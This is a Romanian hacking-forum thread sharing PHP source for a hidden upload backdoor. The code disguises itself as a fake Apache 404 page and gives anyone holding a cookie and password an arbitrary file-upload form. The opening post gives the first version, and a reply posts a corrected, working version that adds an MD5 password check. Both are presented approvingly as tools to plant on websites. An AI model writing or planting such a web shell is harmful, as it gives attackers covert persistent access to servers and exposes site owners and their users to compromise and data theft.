Jump to content
Open

Backdoor ascuns de upload.

Recommended Posts

Posted


<?php
$file = __FILE__;
error_reporting(0) .
if(isset($_COOKIE['parola'])){
if(isset($_POST['parola2'])){
$backdoor = $_POST['parola2'];
if($backdoor == 'muieadmin'){
// Pagina de upload apare doar daca pasii sunt trecuti cu success.

/* -------------------------------------------------------------------------------------------------------------
# forma de upload HTML
-------------------------------------------------------------------------------------------------------------*/
echo '<style type="text/css">
body {
background-color: white;
font-weight: inherit;
}
</style>
<center>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
/* -------------------------------------------------------------------------------------------------------------
#Functiile PHP de urcare fisiere
-------------------------------------------------------------------------------------------------------------*/
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b><font color="#0ACC00">Fisierul a fost incarcat cu succes!</font></b><br><br>';

}
}else {
echo '<b><font color="#CC0000">Fisierul nu a putut fi incarcat!</font></b><br><br></font>';
} # Se termina functia in cazul in care este falsa conditia pentru upload
}else{
echo "<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL $file was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address>
</body></html>"; }
}else{
echo "<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL $file was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address>
</body></html>"; }
}else{
echo "<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL $file was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address>
</body></html>"; }
/* -------------------------------------------------------------------------------------------------------------*/
?>

Va dati si voi seama ce face:)

Posted (edited)
ce face?

Te intelegem ca esti nou pe aici , dar nici chiar sa postezi la fiecare topic " ce face?" sau "cum se face" pentru ca devii stresant , daca nu stiii ce face poti cauta pe google.ro sau intreba pe cineva in particular nu aici , ca nu-i forum de cs.

Asta doar un sfat daca vrei sa-l asculti , pentru ca altfel presimt banu

ON : Frumos Open , folositor multumesc

Scuze pentru micul off , trebuia sa-i explice cineva.

Edited by Coco
  • Active Members
Posted (edited)

Ai bagat o tona de else-uri inutile si acolade de mi se face rau.

In primul rand daca nu ai mai mult de doua actiuni intr-un bloc if / while /for /else /else if etc ... nu trebuie puse acolade faci economie de spatiu.

L-ai facut mai mult la misto? Pentru ca atunci cand faci upload la fisier nu v-a mai functiona al doilea if in care verifica daca exista parola din $_POST (nu stiu de ce ai mai pus si parola in post... puteai sa lasi decat cookie-ul). Ca sa functioneze corecct trebuie sa trimiti si parola prin post....

Desi mi se pare o tampenie poftim cam asa ar trebuie sa arate


<?php
$file = __FILE__;// Penutru ce iti trebuie asta?
error_reporting(0);
if(isset($_COOKIE['parola'])){
if(isset($_POST['parola2'])){
$backdoor = $_POST['parola2'];
if(md5($backdoor) == '078f6d2d803c24911d309eee0cc01152'){ //macar un md5 pune
// Pagina de upload apare doar daca pasii sunt trecuti cu success.

/* -------------------------------------------------------------------------------------------------------------
# forma de upload HTML
-------------------------------------------------------------------------------------------------------------*/
echo '<style type="text/css">
body {
background-color: white;
font-weight: inherit;
}
</style>
<center>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"><input type="hidden" name="parola2" value="'.$backdoor.'"></form>';
/* -------------------------------------------------------------------------------------------------------------
#Functiile PHP de urcare fisiere
-------------------------------------------------------------------------------------------------------------*/
if( $_POST['_upl'] == "Upload" )
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
echo '<b><font color="#0ACC00">Fisierul a fost incarcat cu succes!</font></b><br><br>';
else
echo '<b><font color="#CC0000">Fisierul nu a putut fi incarcat!</font></b><br><br></font>';
}
exit;//iesim din script
}
}
echo "<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL $file was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/10.10 mod_perl/2.0.6 Perl/v5.10.1 mod_antiloris/0.4 Server at xcp.ro Port 80</address>
</body></html>";
/* -------------------------------------------------------------------------------------------------------------*/
?>

Edited by danyweb09

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...